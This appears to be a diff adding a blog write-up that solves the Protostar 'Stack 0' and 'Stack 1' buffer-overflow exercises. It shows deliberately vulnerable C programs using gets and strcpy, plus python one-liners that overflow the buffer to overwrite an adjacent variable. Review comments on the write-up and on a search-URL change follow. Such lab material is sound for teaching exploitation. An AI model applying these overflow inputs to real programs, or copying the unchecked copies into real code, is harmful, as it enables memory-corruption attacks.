-
+
Stack 0
+
+
Here’s what we’re given:
+
+
#include <stdlib.h>
+#include <unistd.h>
+#include <stdio.h>
+
+int main(int argc, char **argv)
+{
+ volatile int modified;
+ char buffer[64];
+
+ modified = 0;
+ gets(buffer);
+
+ if(modified != 0) {
+ printf("you have changed the 'modified' variable\n");
+ } else {
+ printf("Try again?\n");
+ }
+}
+
+
+
+
The first thing I took note of is the size of the buffer
: 64 bytes. After that, the program inputs text for buffer
, and then checks to see if you modified the modified
variable.
+I’m guessing if I put in a string longer than 64 bytes it will work. Let’s see:
+
+
$ echo `python -c 'print "A"*64'` | ./stack0
+Try again?
+
+
+
+
That works as expected, now with 65 bytes:
+
+
$ echo `python -c 'print "A"*65'` | ./stack0
+you have changed the 'modified' variable
+
+
+
+
Solved!
+
+
Stack 1
+
+
Here’s the code we’re given:
+
+
#include <stdlib.h>
+#include <unistd.h>
+#include <stdio.h>
+#include <string.h>
+
+int main(int argc, char **argv)
+{
+ volatile int modified;
+ char buffer[64];
+
+ if(argc == 1) {
+ errx(1, "please specify an argument\n");
+ }
+
+ modified = 0;
+ strcpy(buffer, argv[1]);
+
+ if(modified == 0x61626364) {
+ printf("you have correctly got the variable to the right value\n");
+ } else {
+ printf("Try again, you got 0x%08x\n", modified);
+ }
+}
+
+
+
+
Just like Stack 0, we’re given a buffer
array size 64 bytes and we’re also asked to input the contents of it. Except it looks like modified has to equal 0x61626364
instead of just changing it like before.
+
+
Keep in mind this is little endian, so I’ll input the value in reverse order:
+
+
$ ./stack1 `python -c 'print "A"*64'`
+Try again, you got 0x00000000
+
+
+
+
That works as expected, now with the additional bytes:
+
+
$ ./stack1 `python -c 'print "A"*64 + "\x64\x63\x62\x61"'`
+you have correctly got the variable to the right value
+
+
+
+
Woo!
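Review bot: the Stack 0 text moves from the 64-byte run to the 65-byte run without saying why one extra byte flips the result, and "That works as expected" after `Try again?` reads as if nothing had been written out of bounds yet. With 64 `A`s, `gets(buffer)` already stores a 65th byte, the terminating NUL, past the end of `buffer`; the 65-byte run shows that this position belongs to `modified`, which is already 0, so the check still fails. I'd add a sentence saying that, and that the result depends on this build placing `modified` directly after `buffer`. The same applies to the 64-byte `strcpy` run in Stack 1, where `"\x64\x63\x62\x61"` could also be written as `"dcba"` so the link to 0x61626364 is visible. The commands use the Python 2 `print` statement, which is worth stating because they fail under Python 3.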
diff --git a/_site/writeup/test_post.html b/_site/writeup/test_post.html
index 377f449..b9821e4 100644
--- a/_site/writeup/test_post.html
+++ b/_site/writeup/test_post.html
@@ -5,6 +5,11 @@
+
@@ -85,7 +94,7 @@
$('#dummySearch').submit(function(e) {
e.preventDefault();
keyword = $('#search').val();
- url = 'https://www.google.com.hk/search?q=site%3Apaul.walko.org+' + keyword;
+ url = 'https://www.google.com/search?q=site%3Apaul.walko.org+' + keyword;
location.href = url;
})
})
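Review bot: `keyword` is still concatenated into the search URL unencoded on the changed `url = ...` line, so a search term containing `&`, `#` or `+` alters or truncates the query that is sent. Wrap it as `encodeURIComponent(keyword)`. No declaration of `keyword` or `url` is visible in this hunk; if there is none elsewhere, both become implicit globals and should be declared with `var` inside the handler.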